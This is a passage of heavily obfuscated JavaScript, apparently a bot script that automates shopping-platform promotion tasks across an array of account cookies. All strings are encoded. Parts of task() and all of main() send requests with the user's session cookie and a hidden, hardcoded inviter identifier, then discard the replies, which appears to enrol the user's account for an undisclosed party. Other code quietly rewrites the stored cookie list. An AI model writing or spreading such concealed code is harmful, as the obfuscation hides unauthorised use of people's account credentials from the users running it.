}else if(_0x57a8f0[_0x537f('‫12e','\x73\x36\x26\x66')](_0x464378[_0x537f('‮12f','\x4c\x52\x32\x62')],_0x57a8f0[_0x537f('‫130','\x28\x26\x6c\x4a')])){if(_0x57a8f0[_0x537f('‮131','\x47\x55\x21\x39')](_0x57a8f0[_0x537f('‫132','\x46\x71\x33\x64')],_0x57a8f0[_0x537f('‮133','\x47\x74\x6c\x6a')])){console[_0x537f('‫134','\x78\x75\x46\x50')](error);}else{await _0x57a8f0[_0x537f('‮135','\x34\x24\x6a\x36')](task,_0x57a8f0[_0x537f('‮136','\x61\x6c\x61\x53')],{});await _0x57a8f0[_0x537f('‮137','\x42\x52\x6d\x30')](task,_0x57a8f0[_0x537f('‮138','\x5e\x66\x72\x34')],{'missionType':_0x464378[_0x537f('‮103','\x37\x50\x30\x37')],'goodsNumId':$[_0x537f('‮139','\x5b\x53\x4c\x61')]});}}else{await _0x57a8f0[_0x537f('‫13a','\x4e\x59\x73\x4d')](task,_0x57a8f0[_0x537f('‫13b','\x29\x37\x50\x38')],{'missionType':_0x464378[_0x537f('‫13c','\x4e\x59\x73\x4d')]});}}else{result[_0x537f('‫13d','\x26\x37\x4e\x4d')](cookiesArr[_0x537f('‫13e','\x47\x41\x6c\x29')](i,_0x57a8f0[_0x537f('‮13f','\x39\x29\x43\x49')](i,0x14)));}}else{if(_0x57a8f0[_0x537f('‫140','\x4a\x4c\x6d\x73')](_0x57a8f0[_0x537f('‫141','\x61\x57\x50\x78')],_0x57a8f0[_0x537f('‮142','\x26\x37\x4e\x4d')])){$[_0x537f('‮143','\x24\x51\x37\x78')](e,resp);}else{console[_0x537f('‫5e','\x42\x5a\x6a\x6c')](_0x57a8f0[_0x537f('‮144','\x59\x4d\x24\x31')](_0x464378[_0x537f('‮145','\x29\x37\x50\x38')],_0x57a8f0[_0x537f('‮146','\x35\x53\x5e\x57')]));}}}await $[_0x537f('‮147','\x34\x24\x6a\x36')](0x7d0);if(_0x57a8f0[_0x537f('‫148','\x21\x5d\x2a\x38')]($[_0x537f('‫149','\x4e\x77\x4a\x29')],0x0)){var _0x209ca4=_0x57a8f0[_0x537f('‫14a','\x24\x51\x37\x78')][_0x537f('‮14b','\x29\x37\x50\x38')]('\x7c'),_0x249c2=0x0;while(!![]){switch(_0x209ca4[_0x249c2++]){case'\x30':await _0x57a8f0[_0x537f('‫14c','\x37\x50\x30\x37')](task,_0x57a8f0[_0x537f('‫14d','\x35\x53\x5e\x57')],{'type':_0x57a8f0[_0x537f('‮14e','\x24\x51\x37\x78')],'remark':_0x57a8f0[_0x537f('‮14f','\x4a\x4c\x6d\x73')]});continue;case'\x31':await $[_0x537f('‫150','\x5e\x66\x72\x34')](0x3e8);continue;case'\x32':await _0x57a8f0[_0x537f('‫151','\x67\x57\x44\x6e')](task,_0x57a8f0[_0x537f('‫152','\x21\x6c\x36\x75')],{'gameLogId':$[_0x537f('‮153','\x42\x6d\x46\x4a')],'point':0xc8});continue;case'\x33':await _0x57a8f0[_0x537f('‫154','\x25\x72\x61\x32')](task,_0x57a8f0[_0x537f('‫155','\x31\x26\x59\x5e')],{'carId':0x1,'carName':_0x57a8f0[_0x537f('‮156','\x67\x57\x44\x6e')]});continue;case'\x34':await $[_0x537f('‫ef','\x25\x72\x61\x32')](0x7d0);continue;case'\x35':console[_0x537f('‮157','\x61\x57\x50\x78')](_0x57a8f0[_0x537f('‫158','\x6e\x7a\x78\x6f')]);continue;}break;}}}else{_0x57a8f0[_0x537f('‫159','\x6b\x76\x2a\x41')](resolve);}}else{if(_0x57a8f0[_0x537f('‮15a','\x47\x74\x6c\x6a')](_0x57a8f0[_0x537f('‮15b','\x4c\x58\x6d\x49')],_0x57a8f0[_0x537f('‫15c','\x39\x29\x43\x49')])){$[_0x537f('‮15d','\x67\x36\x57\x4e')](_0x57a8f0[_0x537f('‮15e','\x38\x69\x75\x72')]);}else{console[_0x537f('‮15f','\x59\x4d\x24\x31')](res);$[_0x537f('‫160','\x43\x73\x21\x37')]=res[_0x537f('‫161','\x61\x57\x50\x78')];}}}else{$[_0x537f('‮162','\x38\x69\x75\x72')](_0x57a8f0[_0x537f('‫163','\x61\x6c\x61\x53')]);}}function task(_0x12539d,_0x46cb53,_0x48bb3f=0x1){var _0x4cf0a3={'\x6d\x72\x6e\x50\x5a':_0x537f('‫164','\x21\x6c\x36\x75'),'\x61\x54\x4d\x66\x77':_0x537f('‮165','\x35\x53\x5e\x57'),'\x72\x6e\x75\x6a\x58':function(_0x332c91,_0x5b7f81){return _0x332c91*_0x5b7f81;},'\x6b\x52\x62\x69\x41':_0x537f('‫166','\x74\x41\x72\x35'),'\x4e\x48\x66\x59\x56':_0x537f('‫167','\x6b\x76\x2a\x41'),'\x75\x73\x76\x42\x70':function(_0x57bcff,_0xe988){return _0x57bcff(_0xe988);},'\x69\x48\x72\x44\x6a':_0x537f('‮168','\x74\x41\x72\x35'),'\x6e\x41\x63\x44\x4e':_0x537f('‮169','\x4c\x52\x32\x62'),'\x6a\x53\x44\x61\x69':_0x537f('‫16a','\x26\x58\x58\x73'),'\x52\x51\x55\x7a\x5a':_0x537f('‫16b','\x42\x52\x6d\x30'),'\x76\x49\x69\x75\x4a':_0x537f('‫16c','\x42\x6d\x46\x4a'),'\x63\x46\x67\x73\x53':_0x537f('‮16d','\x38\x69\x75\x72'),'\x77\x61\x75\x68\x74':_0x537f('‮16e','\x24\x51\x37\x78'),'\x64\x6c\x44\x48\x75':_0x537f('‮16f','\x78\x75\x46\x50'),'\x5a\x4c\x74\x4a\x45':_0x537f('‫170','\x6b\x76\x2a\x41'),'\x48\x75\x61\x7a\x78':_0x537f('‫171','\x39\x29\x43\x49'),'\x66\x63\x4d\x65\x54':_0x537f('‮172','\x50\x71\x4a\x36'),'\x53\x50\x6b\x75\x58':_0x537f('‫173','\x5b\x53\x4c\x61'),'\x69\x6a\x53\x64\x52':_0x537f('‮174','\x39\x29\x43\x49'),'\x4f\x73\x4f\x62\x62':function(_0x451ad2,_0x23e317){return _0x451ad2!==_0x23e317;},'\x6b\x4e\x6d\x77\x70':_0x537f('‫175','\x73\x21\x78\x6d'),'\x47\x76\x52\x43\x56':_0x537f('‫176','\x44\x61\x6f\x44'),'\x54\x48\x57\x7a\x6c':function(_0x326729,_0x54d867){return _0x326729!==_0x54d867;},'\x79\x4d\x55\x69\x50':_0x537f('‫177','\x78\x28\x63\x48'),'\x55\x6b\x54\x6f\x78':_0x537f('‮178','\x43\x73\x21\x37'),'\x57\x4b\x77\x4a\x5a':function(_0x497129,_0x12d374){return _0x497129!==_0x12d374;},'\x4e\x76\x68\x61\x75':_0x537f('‮179','\x46\x71\x33\x64'),'\x72\x4a\x73\x6e\x78':_0x537f('‮17a','\x67\x57\x44\x6e'),'\x6b\x49\x6d\x69\x76':_0x537f('‮17b','\x25\x72\x61\x32'),'\x6b\x7a\x51\x46\x7a':_0x537f('‮17c','\x4c\x58\x6d\x49'),'\x68\x79\x4b\x45\x69':function(_0xf5fde6,_0x452f9c){return _0xf5fde6===_0x452f9c;},'\x72\x56\x65\x51\x44':_0x537f('‫17d','\x71\x2a\x6b\x35'),'\x75\x6e\x62\x63\x62':_0x537f('‮17e','\x4c\x43\x4c\x76'),'\x46\x78\x45\x63\x46':function(_0x2353d1,_0x200ad6){return _0x2353d1===_0x200ad6;},'\x4d\x64\x4e\x71\x69':_0x537f('‮17f','\x78\x75\x46\x50'),'\x6d\x57\x63\x4b\x55':_0x537f('‮180','\x37\x50\x30\x37'),'\x67\x4f\x72\x4b\x69':_0x537f('‮181','\x6a\x23\x34\x64'),'\x72\x78\x48\x48\x50':_0x537f('‮182','\x5e\x66\x72\x34'),'\x65\x53\x48\x58\x5a':_0x537f('‮183','\x42\x5a\x6a\x6c'),'\x42\x76\x71\x72\x6e':_0x537f('‮184','\x78\x75\x46\x50'),'\x7a\x54\x56\x42\x71':_0x537f('‫185','\x37\x50\x30\x37'),'\x68\x4e\x78\x4b\x67':_0x537f('‮186','\x73\x36\x26\x66'),'\x67\x4d\x46\x57\x55':_0x537f('‫187','\x47\x41\x6c\x29'),'\x66\x42\x5a\x6c\x6f':_0x537f('‫188','\x71\x2a\x6b\x35'),'\x73\x73\x6f\x56\x6a':_0x537f('‮189','\x48\x5e\x5a\x32'),'\x70\x56\x53\x5a\x6c':function(_0x53c159,_0x22d858){return _0x53c159!==_0x22d858;},'\x6e\x53\x56\x74\x56':_0x537f('‮18a','\x78\x75\x46\x50'),'\x67\x6f\x59\x55\x43':_0x537f('‫18b','\x4a\x4c\x6d\x73'),'\x54\x66\x5a\x46\x65':function(_0x5d06a8){return _0x5d06a8();},'\x54\x67\x52\x77\x6b':function(_0x5013a5){return _0x5013a5();},'\x63\x6c\x64\x65\x5a':_0x537f('‫18c','\x4c\x58\x6d\x49'),'\x77\x42\x53\x4c\x6a':_0x537f('‫18d','\x35\x53\x5e\x57'),'\x52\x63\x72\x59\x51':function(_0x308e1a,_0x2f72b2,_0x2a2124,_0x554306){return _0x308e1a(_0x2f72b2,_0x2a2124,_0x554306);},'\x69\x51\x65\x61\x4a':_0x537f('‫18e','\x4c\x43\x4c\x76'),'\x62\x66\x56\x78\x4f':_0x537f('‫18f','\x4c\x43\x4c\x76')};body={'jsonRpc':_0x4cf0a3[_0x537f('‮190','\x4c\x58\x6d\x49')],'params':{'commonParameter':{'appkey':$[_0x537f('‫191','\x5b\x53\x4c\x61')],'m':_0x4cf0a3[_0x537f('‮192','\x4a\x4c\x6d\x73')],'sign':'','timestamp':new Date(),'userId':$[_0x537f('‮80','\x44\x61\x6f\x44')]},'admJson':{'actId':$[_0x537f('‮193','\x34\x24\x6a\x36')],'method':_0x537f('‫194','\x5e\x66\x72\x34')+_0x12539d,'userId':$[_0x537f('‮195','\x38\x69\x75\x72')],'buyerNick':$[_0x537f('‮196','\x31\x26\x59\x5e')]?$[_0x537f('‫90','\x73\x36\x26\x66')]:''}}};Object[_0x537f('‫197','\x61\x6c\x61\x53')](body[_0x537f('‮198','\x47\x41\x6c\x29')][_0x537f('‮199','\x42\x52\x6d\x30')],_0x46cb53);return new Promise(_0x5c7767=>{var _0x429e9b={'\x42\x58\x48\x46\x48':function(_0x5d73c8){return _0x4cf0a3[_0x537f('‫19a','\x37\x50\x30\x37')](_0x5d73c8);},'\x6f\x41\x78\x48\x4e':_0x4cf0a3[_0x537f('‮19b','\x4a\x4c\x6d\x73')]};if(_0x4cf0a3[_0x537f('‫19c','\x6a\x23\x34\x64')](_0x4cf0a3[_0x537f('‮19d','\x42\x78\x58\x51')],_0x4cf0a3[_0x537f('‮19e','\x39\x29\x43\x49')])){$[_0x537f('‮19f','\x47\x74\x6c\x6a')](_0x4cf0a3[_0x537f('‫1a0','\x5e\x66\x72\x34')](taskUrl,_0x12539d,body,_0x48bb3f),async(_0x2ba78f,_0x2492a8,_0x15a868)=>{var _0x10785f={'\x6b\x46\x68\x69\x48':_0x4cf0a3[_0x537f('‮1a1','\x42\x5a\x6a\x6c')],'\x6e\x76\x44\x48\x47':_0x4cf0a3[_0x537f('‫1a2','\x59\x4d\x24\x31')],'\x52\x55\x4c\x47\x54':function(_0x4acfde,_0x583662){return _0x4cf0a3[_0x537f('‮1a3','\x26\x58\x58\x73')](_0x4acfde,_0x583662);},'\x45\x69\x4b\x66\x6e':_0x4cf0a3[_0x537f('‫1a4','\x47\x74\x6c\x6a')],'\x51\x4e\x48\x75\x7a':_0x4cf0a3[_0x537f('‫1a5','\x42\x78\x58\x51')],'\x6a\x64\x43\x72\x66':function(_0x53abb6,_0x2ec3f4){return _0x4cf0a3[_0x537f('‫1a6','\x31\x26\x59\x5e')](_0x53abb6,_0x2ec3f4);},'\x4c\x6d\x77\x6d\x42':_0x4cf0a3[_0x537f('‮1a7','\x59\x4d\x24\x31')],'\x75\x72\x59\x73\x76':_0x4cf0a3[_0x537f('‮1a8','\x6e\x7a\x78\x6f')],'\x64\x61\x45\x72\x47':_0x4cf0a3[_0x537f('‮1a9','\x74\x41\x72\x35')],'\x68\x61\x42\x4c\x65':_0x4cf0a3[_0x537f('‫1aa','\x42\x78\x58\x51')],'\x72\x69\x68\x6c\x61':_0x4cf0a3[_0x537f('‮1ab','\x39\x29\x43\x49')],'\x68\x71\x7a\x49\x6b':function(_0x46f677,_0x1152ce){return _0x4cf0a3[_0x537f('‮1ac','\x6b\x76\x2a\x41')](_0x46f677,_0x1152ce);},'\x77\x6a\x6b\x46\x71':_0x4cf0a3[_0x537f('‮1ad','\x46\x71\x33\x64')],'\x6f\x5a\x78\x4a\x56':_0x4cf0a3[_0x537f('‮1ae','\x24\x51\x37\x78')],'\x64\x50\x78\x51\x64':_0x4cf0a3[_0x537f('‮1af','\x73\x21\x78\x6d')],'\x5a\x4a\x56\x57\x58':_0x4cf0a3[_0x537f('‫1b0','\x31\x26\x59\x5e')],'\x43\x43\x59\x70\x6c':_0x4cf0a3[_0x537f('‫1b1','\x4e\x77\x4a\x29')],'\x56\x62\x65\x4c\x49':_0x4cf0a3[_0x537f('‮1b2','\x24\x51\x37\x78')],'\x53\x4c\x74\x77\x61':_0x4cf0a3[_0x537f('‮1b3','\x26\x37\x4e\x4d')],'\x55\x64\x41\x75\x74':_0x4cf0a3[_0x537f('‮1b4','\x4c\x58\x6d\x49')]};if(_0x4cf0a3[_0x537f('‫1b5','\x37\x50\x30\x37')](_0x4cf0a3[_0x537f('‮1b6','\x37\x50\x30\x37')],_0x4cf0a3[_0x537f('‫1b7','\x6b\x76\x2a\x41')])){try{if(_0x4cf0a3[_0x537f('‫1b8','\x21\x6c\x36\x75')](_0x4cf0a3[_0x537f('‫1b9','\x6e\x7a\x78\x6f')],_0x4cf0a3[_0x537f('‫1ba','\x61\x57\x50\x78')])){if(_0x2ba78f){if(_0x4cf0a3[_0x537f('‫1bb','\x28\x26\x6c\x4a')](_0x4cf0a3[_0x537f('‫1bc','\x47\x41\x6c\x29')],_0x4cf0a3[_0x537f('‮1bd','\x29\x37\x50\x38')])){$[_0x537f('‮1be','\x47\x74\x6c\x6a')](_0x2ba78f);}else{_0x429e9b[_0x537f('‮1bf','\x6e\x7a\x78\x6f')](_0x5c7767);}}else{if(_0x15a868){_0x15a868=JSON[_0x537f('‮1c0','\x61\x57\x50\x78')](_0x15a868);if(_0x15a868[_0x537f('‮1c1','\x74\x41\x72\x35')]){if(_0x15a868[_0x537f('‫1c2','\x26\x58\x58\x73')][_0x537f('‫1c3','\x61\x6c\x61\x53')]){switch(_0x12539d){case _0x4cf0a3[_0x537f('‮1c4','\x6b\x76\x2a\x41')]:$[_0x537f('‮1c5','\x67\x57\x44\x6e')]=_0x15a868[_0x537f('‫1c6','\x5b\x53\x4c\x61')][_0x537f('‮1c7','\x34\x24\x6a\x36')][_0x537f('‫1c8','\x78\x75\x46\x50')][_0x537f('‫1c9','\x5e\x66\x72\x34')];$[_0x537f('‮1ca','\x35\x53\x5e\x57')]=_0x15a868[_0x537f('‫1cb','\x74\x41\x72\x35')][_0x537f('‮12a','\x4c\x52\x32\x62')][_0x537f('‫1cc','\x78\x75\x46\x50')][_0x537f('‮1cd','\x47\x41\x6c\x29')];$[_0x537f('‮1ce','\x42\x78\x58\x51')]=_0x15a868[_0x537f('‮1cf','\x69\x71\x68\x37')][_0x537f('‮1d0','\x43\x73\x21\x37')][_0x537f('‮1d1','\x5b\x53\x4c\x61')];$[_0x537f('‫1d2','\x6a\x23\x34\x64')]=_0x15a868[_0x537f('‫1d3','\x25\x72\x61\x32')][_0x537f('‫1d4','\x42\x5a\x6a\x6c')][_0x537f('‫1d5','\x4e\x77\x4a\x29')][_0x537f('‫1d6','\x4c\x52\x32\x62')];break;case _0x4cf0a3[_0x537f('‮1d7','\x4a\x4c\x6d\x73')]:if(_0x4cf0a3[_0x537f('‫1d8','\x50\x71\x4a\x36')](_0x15a868[_0x537f('‫1c2','\x26\x58\x58\x73')][_0x537f('‮1d9','\x42\x52\x6d\x30')],0x1f4)){if(_0x4cf0a3[_0x537f('‮1da','\x73\x36\x26\x66')](_0x4cf0a3[_0x537f('‫1db','\x78\x75\x46\x50')],_0x4cf0a3[_0x537f('‮1dc','\x61\x6c\x61\x53')])){console[_0x537f('‫1dd','\x4c\x52\x32\x62')](_0x15a868[_0x537f('‮1de','\x4e\x77\x4a\x29')][_0x537f('‫1df','\x38\x69\x75\x72')]);}else{$[_0x537f('‮157','\x61\x57\x50\x78')](_0x2ba78f);}}else if(_0x4cf0a3[_0x537f('‮1e0','\x73\x36\x26\x66')](_0x15a868[_0x537f('‫1e1','\x4c\x43\x4c\x76')][_0x537f('‮1e2','\x29\x37\x50\x38')],0xc8)){if(_0x4cf0a3[_0x537f('‮1e3','\x59\x4d\x24\x31')](_0x4cf0a3[_0x537f('‫1e4','\x26\x37\x4e\x4d')],_0x4cf0a3[_0x537f('‮1e5','\x50\x71\x4a\x36')])){$[_0x537f('‫1e6','\x21\x6c\x36\x75')]=0x1;$[_0x537f('‮1e7','\x5e\x66\x72\x34')]=_0x10785f[_0x537f('‫1e8','\x59\x4d\x24\x31')];const _0x520524=[_0x10785f[_0x537f('‫1e9','\x42\x52\x6d\x30')]];let _0x47040a=_0x520524[Math[_0x537f('‫1ea','\x21\x6c\x36\x75')](_0x10785f[_0x537f('‮1eb','\x26\x58\x58\x73')](Math[_0x537f('‫1ec','\x46\x71\x33\x64')](),_0x520524[_0x537f('‫1ed','\x42\x78\x58\x51')]))];let _0x4f849d={'\x75\x72\x6c':_0x10785f[_0x537f('‫1ee','\x59\x4d\x24\x31')],'\x62\x6f\x64\x79':_0x537f('‮1ef','\x67\x36\x57\x4e')+JSON[_0x537f('‫1f0','\x34\x24\x6a\x36')]({'method':_0x10785f[_0x537f('‫1f1','\x47\x41\x6c\x29')],'data':{'channel':'\x31','encryptionInviterPin':_0x10785f[_0x537f('‫1f2','\x37\x50\x30\x37')](encodeURIComponent,_0x47040a),'type':0x1}})+_0x537f('‮1f3','\x4e\x77\x4a\x29')+Date[_0x537f('‮1f4','\x47\x74\x6c\x6a')](),'\x68\x65\x61\x64\x65\x72\x73':{'Host':_0x10785f[_0x537f('‮1f5','\x42\x6d\x46\x4a')],'Accept':_0x10785f[_0x537f('‮1f6','\x74\x41\x72\x35')],'Content-Type':_0x10785f[_0x537f('‫1f7','\x47\x74\x6c\x6a')],'Origin':_0x10785f[_0x537f('‫1f8','\x6b\x76\x2a\x41')],'Accept-Language':_0x10785f[_0x537f('‮1f9','\x42\x5a\x6a\x6c')],'User-Agent':$[_0x537f('‮1fa','\x42\x6d\x46\x4a')]()?process[_0x537f('‫b','\x4a\x4c\x6d\x73')][_0x537f('‫1fb','\x47\x55\x21\x39')]?process[_0x537f('‮1fc','\x42\x5a\x6a\x6c')][_0x537f('‫1fb','\x47\x55\x21\x39')]:_0x10785f[_0x537f('‫1fd','\x73\x36\x26\x66')](require,_0x10785f[_0x537f('‫1fe','\x47\x41\x6c\x29')])[_0x537f('‫1ff','\x6b\x76\x2a\x41')]:$[_0x537f('‫200','\x38\x69\x75\x72')](_0x10785f[_0x537f('‮201','\x48\x32\x4d\x34')])?$[_0x537f('‮202','\x78\x28\x63\x48')](_0x10785f[_0x537f('‫203','\x25\x72\x61\x32')]):_0x10785f[_0x537f('‮204','\x39\x29\x43\x49')],'Referer':_0x10785f[_0x537f('‫205','\x46\x71\x33\x64')],'Accept-Encoding':_0x10785f[_0x537f('‫206','\x48\x5e\x5a\x32')],'Cookie':maincookie}};$[_0x537f('‮207','\x59\x4d\x24\x31')](_0x4f849d,(_0x41db89,_0x5e45e7,_0x3b6f55)=>{});}else{console[_0x537f('‫91','\x42\x78\x58\x51')](_0x15a868[_0x537f('‫208','\x73\x21\x78\x6d')][_0x537f('‫209','\x42\x78\x58\x51')][_0x537f('‫20a','\x47\x41\x6c\x29')]);}}break;case _0x4cf0a3[_0x537f('‮20b','\x35\x53\x5e\x57')]:if(_0x15a868[_0x537f('‮20c','\x67\x57\x44\x6e')][_0x537f('‮20d','\x25\x72\x61\x32')]){if(_0x4cf0a3[_0x537f('‮20e','\x34\x24\x6a\x36')](_0x4cf0a3[_0x537f('‮20f','\x21\x6c\x36\x75')],_0x4cf0a3[_0x537f('‮210','\x4c\x58\x6d\x49')])){let _0xeeb236=$[_0x537f('‫211','\x46\x71\x33\x64')](_0x10785f[_0x537f('‫212','\x4c\x58\x6d\x49')])||'\x5b\x5d';_0xeeb236=JSON[_0x537f('‫213','\x24\x51\x37\x78')](_0xeeb236);cookiesArr=_0xeeb236[_0x537f('‮214','\x4e\x77\x4a\x29')](_0x1ced99=>_0x1ced99[_0x537f('‮215','\x6a\x23\x34\x64')]);cookiesArr[_0x537f('‮216','\x4e\x59\x73\x4d')]();cookiesArr[_0x537f('‮217','\x43\x73\x21\x37')](...[$[_0x537f('‫218','\x6e\x7a\x78\x6f')](_0x10785f[_0x537f('‫219','\x39\x29\x43\x49')]),$[_0x537f('‮21a','\x28\x26\x6c\x4a')](_0x10785f[_0x537f('‮21b','\x39\x29\x43\x49')])]);cookiesArr[_0x537f('‫21c','\x47\x41\x6c\x29')]();cookiesArr=cookiesArr[_0x537f('‮21d','\x71\x2a\x6b\x35')](_0x3ea66f=>!!_0x3ea66f);}else{$[_0x537f('‫21e','\x78\x75\x46\x50')]=_0x15a868[_0x537f('‫1c2','\x26\x58\x58\x73')][_0x537f('‮12a','\x4c\x52\x32\x62')];}}break;case _0x4cf0a3[_0x537f('‮21f','\x71\x2a\x6b\x35')]:if(_0x15a868[_0x537f('‫220','\x4a\x4c\x6d\x73')][_0x537f('‫221','\x47\x74\x6c\x6a')]){$[_0x537f('‫222','\x5e\x66\x72\x34')]=_0x15a868[_0x537f('‫223','\x4e\x59\x73\x4d')][_0x537f('‮1c7','\x34\x24\x6a\x36')][_0x537f('‮224','\x4c\x52\x32\x62')][_0x537f('‫225','\x59\x4d\x24\x31')];}break;case _0x4cf0a3[_0x537f('‮226','\x44\x61\x6f\x44')]:if(_0x15a868[_0x537f('‫1c2','\x26\x58\x58\x73')][_0x537f('‮227','\x71\x2a\x6b\x35')]){$[_0x537f('‮228','\x48\x32\x4d\x34')]=_0x15a868[_0x537f('‫1d3','\x25\x72\x61\x32')][_0x537f('‫229','\x24\x51\x37\x78')][_0x537f('‫22a','\x69\x71\x68\x37')][_0x537f('‫22b','\x21\x5d\x2a\x38')];}break;case _0x4cf0a3[_0x537f('‮22c','\x42\x6d\x46\x4a')]:if(_0x15a868[_0x537f('‫220','\x4a\x4c\x6d\x73')][_0x537f('‫22d','\x35\x53\x5e\x57')]){if(_0x4cf0a3[_0x537f('‮22e','\x35\x53\x5e\x57')](_0x4cf0a3[_0x537f('‮22f','\x47\x74\x6c\x6a')],_0x4cf0a3[_0x537f('‮230','\x50\x71\x4a\x36')])){$[_0x537f('‫231','\x46\x71\x33\x64')]=_0x15a868[_0x537f('‮232','\x44\x61\x6f\x44')][_0x537f('‫233','\x6a\x23\x34\x64')][_0x537f('‫234','\x4c\x52\x32\x62')];}else{console[_0x537f('‮235','\x29\x37\x50\x38')](_0x2ba78f);}}break;case _0x4cf0a3[_0x537f('‫236','\x48\x5e\x5a\x32')]:if(_0x15a868[_0x537f('‫1e1','\x4c\x43\x4c\x76')][_0x537f('‮237','\x21\x6c\x36\x75')]){if(_0x4cf0a3[_0x537f('‫238','\x24\x51\x37\x78')](_0x4cf0a3[_0x537f('‮239','\x69\x71\x68\x37')],_0x4cf0a3[_0x537f('‫23a','\x42\x6d\x46\x4a')])){$[_0x537f('‫91','\x42\x78\x58\x51')](_0x429e9b[_0x537f('‮23b','\x42\x6d\x46\x4a')]);}else{console[_0x537f('‮15f','\x59\x4d\x24\x31')](_0x15a868[_0x537f('‮23c','\x78\x75\x46\x50')]);}}break;case _0x4cf0a3[_0x537f('‮23d','\x73\x36\x26\x66')]:if(_0x15a868[_0x537f('‫1cb','\x74\x41\x72\x35')][_0x537f('‮23e','\x61\x57\x50\x78')]){console[_0x537f('‮118','\x50\x71\x4a\x36')](_0x15a868[_0x537f('‫43','\x6b\x76\x2a\x41')]);}break;default:break;}}}}else{$[_0x537f('‮162','\x38\x69\x75\x72')](_0x4cf0a3[_0x537f('‫23f','\x25\x72\x61\x32')]);}}}else{$[_0x537f('‮240','\x38\x69\x75\x72')]=_0x15a868[_0x537f('‫241','\x71\x2a\x6b\x35')][_0x537f('‮1cf','\x69\x71\x68\x37')][_0x537f('‮242','\x4e\x77\x4a\x29')][_0x537f('‮243','\x71\x2a\x6b\x35')];}}catch(_0x3600fc){if(_0x4cf0a3[_0x537f('‫244','\x28\x26\x6c\x4a')](_0x4cf0a3[_0x537f('‫245','\x4c\x52\x32\x62')],_0x4cf0a3[_0x537f('‮246','\x43\x73\x21\x37')])){$[_0x537f('‫247','\x67\x57\x44\x6e')](_0x3600fc);}else{res=JSON[_0x537f('‮11f','\x50\x71\x4a\x36')](_0x15a868);if(res[_0x537f('‮248','\x38\x69\x75\x72')]){console[_0x537f('‮249','\x21\x5d\x2a\x38')](res);$[_0x537f('‫24a','\x42\x5a\x6a\x6c')]=res[_0x537f('‫24b','\x59\x4d\x24\x31')];}}}finally{_0x4cf0a3[_0x537f('‫24c','\x67\x36\x57\x4e')](_0x5c7767);}}else{_0x429e9b[_0x537f('‫24d','\x42\x52\x6d\x30')](_0x5c7767);}});}else{console[_0x537f('‫24e','\x73\x36\x26\x66')](error);}});}async function main(_0x6c4218){var _0x3a2484={'\x62\x71\x4d\x66\x6e':_0x537f('‫24f','\x78\x75\x46\x50'),'\x72\x4a\x74\x65\x44':_0x537f('‮250','\x61\x57\x50\x78'),'\x54\x6e\x73\x4a\x64':function(_0x496ea3,_0x3226d5){return _0x496ea3*_0x3226d5;},'\x66\x49\x57\x4c\x42':_0x537f('‮251','\x6a\x23\x34\x64'),'\x73\x65\x71\x75\x50':_0x537f('‫252','\x78\x28\x63\x48'),'\x5a\x6c\x65\x4d\x55':function(_0x4572f7,_0x161d7f){return _0x4572f7(_0x161d7f);},'\x74\x48\x46\x6a\x52':_0x537f('‮253','\x47\x74\x6c\x6a'),'\x41\x50\x69\x6d\x4c':_0x537f('‮254','\x31\x26\x59\x5e'),'\x53\x5a\x79\x74\x4d':_0x537f('‫255','\x71\x2a\x6b\x35'),'\x66\x4c\x63\x75\x49':_0x537f('‮256','\x5e\x66\x72\x34'),'\x59\x78\x54\x4e\x4b':_0x537f('‫257','\x78\x75\x46\x50'),'\x44\x6c\x69\x49\x56':function(_0xbab27c,_0x1e11e6){return _0xbab27c(_0x1e11e6);},'\x6f\x4e\x66\x67\x4f':_0x537f('‮258','\x4c\x43\x4c\x76'),'\x56\x5a\x79\x49\x4a':_0x537f('‫259','\x4c\x43\x4c\x76'),'\x69\x49\x6a\x62\x75':_0x537f('‮25a','\x4c\x43\x4c\x76'),'\x64\x67\x79\x44\x6b':_0x537f('‮25b','\x35\x53\x5e\x57'),'\x4d\x41\x5a\x43\x52':_0x537f('‫25c','\x24\x51\x37\x78')};$[_0x537f('‫3b','\x4a\x4c\x6d\x73')]=0x1;$[_0x537f('‮25d','\x35\x53\x5e\x57')]=_0x3a2484[_0x537f('‫25e','\x48\x5e\x5a\x32')];const _0x2ab55d=[_0x3a2484[_0x537f('‫25f','\x47\x41\x6c\x29')]];let _0x1dea4c=_0x2ab55d[Math[_0x537f('‮260','\x71\x2a\x6b\x35')](_0x3a2484[_0x537f('‮261','\x47\x41\x6c\x29')](Math[_0x537f('‮262','\x37\x50\x30\x37')](),_0x2ab55d[_0x537f('‫263','\x5b\x53\x4c\x61')]))];let _0x6e683e={'\x75\x72\x6c':_0x3a2484[_0x537f('‫264','\x47\x74\x6c\x6a')],'\x62\x6f\x64\x79':_0x537f('‫265','\x6e\x7a\x78\x6f')+JSON[_0x537f('‫266','\x50\x71\x4a\x36')]({'method':_0x3a2484[_0x537f('‮267','\x78\x28\x63\x48')],'data':{'channel':'\x31','encryptionInviterPin':_0x3a2484[_0x537f('‫268','\x4c\x52\x32\x62')](encodeURIComponent,_0x1dea4c),'type':0x1}})+_0x537f('‮269','\x34\x24\x6a\x36')+Date[_0x537f('‫26a','\x71\x2a\x6b\x35')](),'\x68\x65\x61\x64\x65\x72\x73':{'Host':_0x3a2484[_0x537f('‫26b','\x46\x71\x33\x64')],'Accept':_0x3a2484[_0x537f('‮26c','\x47\x41\x6c\x29')],'Content-Type':_0x3a2484[_0x537f('‫26d','\x44\x61\x6f\x44')],'Origin':_0x3a2484[_0x537f('‮26e','\x42\x6d\x46\x4a')],'Accept-Language':_0x3a2484[_0x537f('‫26f','\x4e\x59\x73\x4d')],'User-Agent':$[_0x537f('‫270','\x37\x50\x30\x37')]()?process[_0x537f('‮271','\x4c\x43\x4c\x76')][_0x537f('‫272','\x42\x5a\x6a\x6c')]?process[_0x537f('‮273','\x47\x55\x21\x39')][_0x537f('‮274','\x38\x69\x75\x72')]:_0x3a2484[_0x537f('‫275','\x25\x72\x61\x32')](require,_0x3a2484[_0x537f('‮276','\x5b\x53\x4c\x61')])[_0x537f('‮277','\x71\x2a\x6b\x35')]:$[_0x537f('‮278','\x71\x2a\x6b\x35')](_0x3a2484[_0x537f('‫279','\x6e\x7a\x78\x6f')])?$[_0x537f('‫27a','\x35\x53\x5e\x57')](_0x3a2484[_0x537f('‮27b','\x29\x37\x50\x38')]):_0x3a2484[_0x537f('‮27c','\x4c\x52\x32\x62')],'Referer':_0x3a2484[_0x537f('‮27d','\x4e\x77\x4a\x29')],'Accept-Encoding':_0x3a2484[_0x537f('‫27e','\x4e\x59\x73\x4d')],'Cookie':_0x6c4218}};$[_0x537f('‫27f','\x73\x21\x78\x6d')](_0x6e683e,(_0x63964,_0x1bdf22,_0x18f3cc)=>{});}function 